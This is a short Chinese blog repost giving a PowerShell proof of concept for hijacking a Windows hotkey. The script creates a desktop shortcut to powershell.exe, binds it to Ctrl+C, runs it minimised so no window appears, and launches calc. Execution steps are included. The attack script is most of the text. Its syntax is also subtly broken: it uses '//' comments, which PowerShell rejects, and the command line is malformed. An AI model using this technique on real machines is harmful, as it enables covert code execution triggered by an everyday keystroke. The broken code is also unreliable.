简单易用,用Powershell劫持Windows系统快捷键

Posted wwlww

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了简单易用,用Powershell劫持Windows系统快捷键相关的知识,希望对你有一定的参考价值。

POC: 
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("desktop\desktoppayload.lnk") // 在桌面创建快捷方式按钮
$Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" // 执行文件
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" // 设置快捷按钮图标
$Shortcut.hotkey = "ctrl+c" // 快捷键
 
$Shortcut.WindowStyle = ‘7‘ // 最小化执行,避免弹窗
 
$Shortcut.Arguments = ‘calc‘ // 执行参数
$Shortcut.Save()
 执行方法:
保存poc,命令行执行
TYPE  POC位置 | powershell.exe - profile -
删除快捷图标即可还原 


以上是关于简单易用,用Powershell劫持Windows系统快捷键的主要内容,如果未能解决你的问题,请参考以下文章

PowerShell入门学习

powershell基础免杀

Win10怎么安装windows powershell……

C# 编写一个简单易用的 Windows 截屏增强工具

Windows 平台下局域网劫持测试工具 – EvilFoca

使用PowerShell 监控运行时间和连接情况